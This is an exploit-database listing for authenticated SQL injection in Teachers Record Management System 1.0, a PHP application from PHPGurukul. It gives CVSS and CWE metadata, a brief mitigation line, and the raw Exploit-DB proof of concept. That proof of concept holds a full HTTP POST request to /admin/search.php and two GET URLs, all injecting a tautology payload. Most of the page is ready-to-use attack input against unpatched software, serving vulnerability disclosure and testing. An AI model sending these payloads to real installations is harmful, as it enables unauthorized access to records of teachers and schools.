header-logo
Suggest Exploit
vendor:
Teachers Record Management System
by:
nhattruong
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Teachers Record Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpgurukul:teachers_record_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10 + XAMPP v3.2.4
2021

Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)

Teachers Record Management System 1.0 is vulnerable to multiple authenticated SQL Injection attacks. An attacker can exploit this vulnerability by sending malicious payloads to the application. The payloads can be sent via POST request to the search.php page or via GET request to the edit-subjects-detail.php and edit-teacher-detail.php pages. The payloads can be used to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. All user input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
# Date: 05-10-2021
# Exploit Author: nhattruong
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4

POC:
1. Go to url http://localhost/login.php
2. Login with default creds
3. Execute the payload

Payload #1:

POST /admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/search.php
Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
Upgrade-Insecure-Requests: 1

searchdata=a' or 1=1-- -&search=

Payload #2:

http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -

Payload #3:

http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -

Navigation

Suggest Exploit

Services By CQR